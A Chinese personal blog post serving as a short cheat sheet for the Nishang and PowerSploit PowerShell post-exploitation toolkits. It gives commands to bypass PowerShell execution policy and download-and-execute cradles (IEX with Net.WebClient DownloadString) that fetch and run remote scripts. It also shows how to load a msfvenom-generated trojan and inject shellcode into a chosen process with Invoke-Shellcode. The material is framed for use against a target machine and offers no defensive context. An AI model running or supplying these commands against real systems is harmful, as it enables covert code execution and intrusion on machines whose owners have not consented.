• 欢迎访问惜文个人博客
  • 本博客最新公告:本站已经支持使用QQ和GitHub帐号快捷登录啦!
  • 访问本站建议使用火狐和谷歌浏览器哦!
  • 不知道要写什么哈哈
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏惜文博客吧
  • 源码模板插件免费下载,传送门:点我去看看传说中的安全之家!

Nishang/PowerSploit工具脚本

网络安全 惜 文 1年前 (2018-12-01) 1870次浏览 0个评论 扫描二维码

 

 nishang/powersploit都是针对powershell的渗透工具,提供了丰富powershell脚本,在后渗透的时候,不需要在靶机上上传任何工具,只要一个powershell,就可以远程下载执行脚本

1.Powershell

查看执行策略

Get-ExecutionPolicy

Restricted  //这是默认的设置。不能执行PowerShell脚本
AllSigned   //只有数字签名的脚本将会运行,此外,会提示你允许运行那些使用指定的证书签名的脚本
RemoteSigned    //经本地编写的脚本将会运行,从网络下载的脚本运行,除非他们签名了并且你批准了的签名的证书
UnRestricted    //所有的脚本都将运行

设置执行策略,需要管理员权限

 set-ExecutionPolicy

绕过执行策略执行脚本

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

//远程下载执行
IEX (New-Object Net.WebClient).DownloadString('url')
在cmd模式下:
powershell IEX (New-Object Net.WebClient).DownloadString('url')
powershell -c "IEX (New-Object Net.WebClient).DownloadString('url')"

2.Nishang

导入所有模块nishang

import-module ./nishang.psm1

get-command -module nishang     //查看命令

单独导入Invoke-PortScan脚本

IEX (New-Object Net.WebClient).DownloadString(“http://localhost/webTools/nishang/Scan/Invoke-PortScan.ps1”)

get-help Invoke-PortScan //查看使用方法

nishang提供了丰富的脚本Nishang/PowerSploit工具脚本

3.PowerSploit

 用法和nishang一样,有些重叠脚本

Invoke-Shellcode:将shellcode插入您选择的进程ID或本地PowerShell中

IEX (New-Object Net.WebClient).DownloadString(“http://Invoke-Shellcode.ps1”) //导入Invoke-Shellcode脚本
IEX (New-Object Net.WebClient).DownloadString(“http://msf.ps1”) //导入msfvenom生成的木马
Invoke-Shellcode -Shellcode ($buf) //直接运行
Invoke-Shellcode -ProcessID id -Shellcode($buf) -Force //进程注入运行

惜文博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:Nishang/PowerSploit工具脚本
喜欢 (2)
[白白]
分享 (0)
惜 文
关于作者:
感觉自己萌萌哒,啦啦啦,个人说明也没啥可写
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址